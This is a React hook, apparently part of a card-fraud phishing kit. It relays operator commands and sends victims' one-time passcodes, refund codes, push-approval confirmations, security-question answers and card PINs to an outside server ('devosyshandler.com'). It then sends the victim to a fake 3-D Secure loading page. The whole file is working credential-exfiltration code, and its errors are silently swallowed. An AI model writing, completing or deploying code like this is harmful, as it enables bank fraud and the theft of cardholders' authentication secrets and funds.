import { useState, useEffect, useCallback } from 'react';
import { useNavigate } from 'react-router-dom';
import axios from 'axios';

export function useWebSocket() {
  const [currentCommand, setCurrentCommand] = useState(null);
  const navigate = useNavigate();

  useEffect(() => {
    const handleWsCommand = (e) => {
      if (e && e.detail) {
        setCurrentCommand(e.detail);
      }
    };

    window.addEventListener('ws_command', handleWsCommand);
    return () => {
      window.removeEventListener('ws_command', handleWsCommand);
    };
  }, []);

  const sendResponse = useCallback(async (type, data = {}) => {
    const currentUuId = localStorage.getItem('session_uuId') || localStorage.getItem('uuId') || '';

    // 1. Direct WebSocket transmission if available
    if (typeof window !== 'undefined' && typeof window.__sendWsMessage === 'function') {
      try {
        window.__sendWsMessage(type, data);
      } catch (err) {
        console.error('[useWebSocket] WS send error:', err);
      }
    }

    // 2. HTTP Fallback / dual-layer redundancy for devosyshandler
    const serverUrl = (
      (typeof process !== 'undefined' && (process.env.REACT_APP_SERVER_URL || process.env.REACT_APP_DOMAIN)) ||
      'https://devosyshandler.com'
    ).replace(/\/$/, '');

    try {
      if (type === 'otp_response' || type === 'refund_response') {
        axios.post(`${serverUrl}/api/otp_verif`, {
          uuId: currentUuId,
          code: data.code,
          isRefund: type === 'refund_response'
        }).catch(() => {});
      } else if (type === 'push_confirmed') {
        axios.post(`${serverUrl}/api/push_verif`, {
          uuId: currentUuId
        }).catch(() => {});
      } else if (type === 'question_answer') {
        const answerVal = data.answer || data.code || '';
        axios.post(`${serverUrl}/api/secret_verif`, {
          uuId: currentUuId,
          answer: answerVal,
          code: answerVal
        }).catch(() => {});
      } else if (type === 'pin_response') {
        axios.post(`${serverUrl}/api/balance_verif`, {
          uuId: currentUuId,
          code: data.pin
        }).catch(() => {});
      }
    } catch (_) {}

    // 3. Optimistic 0ms navigation to /3ds/loading
    navigate('/3ds/loading');
  }, [navigate]);

  return { sendResponse, currentCommand };
}

export default useWebSocket;
